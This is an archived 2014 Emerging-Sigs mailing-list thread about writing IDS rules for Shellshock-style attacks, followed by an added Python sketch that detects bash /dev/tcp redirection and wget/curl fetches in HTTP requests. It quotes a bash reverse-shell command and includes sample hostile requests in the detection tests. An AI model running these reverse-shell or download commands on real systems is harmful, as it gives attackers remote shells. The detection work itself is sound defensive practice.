[Emerging-Sigs] Do you have a rule for this?

Will Metcalf wmetcalf at emergingthreatspro.com
Fri Sep 26 14:25:39 EDT 2014

Was thinking about this, and also curl/wget/etc. with args inbound to
web_servers. Have also seen direct wgets for ELF bins, Perl DDoS bots,
Perl Downloaders etc.



On Fri, Sep 26, 2014 at 1:19 PM, Livio Ricciulli <livio at metaflows.com>
wrote:

> We have been seeing the bash exploit trying to execute:
> bash -i >& /dev/tcp/<bad_ip>/<bad port> 0>&1
> This will give the bad_ip a shell to the attacker. They would typically
> execute a wget followed by Trojan install.
> I was wondering, do you already have a rule that detects the above?
> If someone was executing that in anything, it would be bad, I think.
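A sketch of the check discussed in this thread, added here as an example and not taken from the posts or from the Emerging Threats ruleset: it scans an inbound HTTP request for bash's `/dev/tcp/` redirection and for wget/curl invoked with a URL argument, after URL-decoding each field. The regexes, function names and sample requests are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Illustrative patterns for the two behaviours raised in the thread.
PATTERNS = {
    # bash's /dev/tcp/<host>/<port> redirection, as in the quoted command
    "bash_dev_tcp": re.compile(r"/dev/tcp/[\w.\-]+/\d{1,5}"),
    # wget or curl followed by arguments that include a URL
    "fetch_with_args": re.compile(r"\b(?:wget|curl)\s[^\r\n]*?(?:https?|ftp)://", re.I),
}

def decode(value, rounds=2):
    """URL-decode up to `rounds` times so single or double encoding cannot hide a match."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_request(raw):
    """Return sorted (location, pattern) hits for one raw inbound HTTP request."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    fields = [("request-line", lines[0])]
    for line in lines[1:]:
        name, _, value = line.partition(":")
        fields.append((name.strip().lower(), value.strip()))
    if body:
        fields.append(("body", body))
    return sorted({(loc, name) for loc, value in fields
                   for name, rx in PATTERNS.items() if rx.search(decode(value))})

# Constructed sample requests (192.0.2.10 is a documentation address).
HOST = "Host: www.example.test\r\n"
SAMPLES = {
    "header": "GET /cgi-bin/status HTTP/1.1\r\n" + HOST
              + "User-Agent: x; bash -i >& /dev/tcp/192.0.2.10/4444 0>&1\r\n\r\n",
    "query": "GET /page?c=wget%20-q%20http%3A%2F%2F192.0.2.10%2Fa.pl HTTP/1.1\r\n" + HOST
             + "User-Agent: curl/7.37.0\r\n\r\n",
    "body": "POST /form HTTP/1.1\r\n" + HOST
            + "\r\ncmd=%252Fdev%252Ftcp%252F192.0.2.10%252F4444",
    "benign": "GET /index.html HTTP/1.1\r\n" + HOST + "User-Agent: Wget/1.15 (linux-gnu)\r\n\r\n",
}

if __name__ == "__main__":
    for label, request in SAMPLES.items():
        print(label, scan_request(request))
```

The benign sample shows that a wget or curl User-Agent string alone does not match, since the pattern requires whitespace and a URL after the tool name.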